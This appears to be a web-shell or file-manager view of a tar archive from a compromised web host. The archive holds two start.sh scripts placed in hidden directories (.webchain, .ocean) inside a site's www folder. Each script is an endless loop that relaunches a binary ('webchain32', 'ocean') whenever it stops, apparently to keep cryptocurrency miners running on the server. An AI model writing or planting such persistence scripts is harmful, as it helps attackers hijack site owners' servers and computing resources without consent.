| Current Path : /home/bourgleram/www/398a1/ |
| Current File : /home/bourgleram/www/398a1/start.sh.tar |
home/bourgleram/www/.webchain/start.sh 0000755 00000000170 15252220603 0014004 0 ustar 00 #!/bin/bash
while true; do
if ! pgrep webchain32 > /dev/null; then
./webchain32
fi
sleep 20
done
home/bourgleram/www/.ocean/start.sh 0000755 00000000156 15252565406 0013332 0 ustar 00 #!/bin/bash
while true; do
if ! pgrep ocean > /dev/null; then
./ocean
fi
sleep 20
done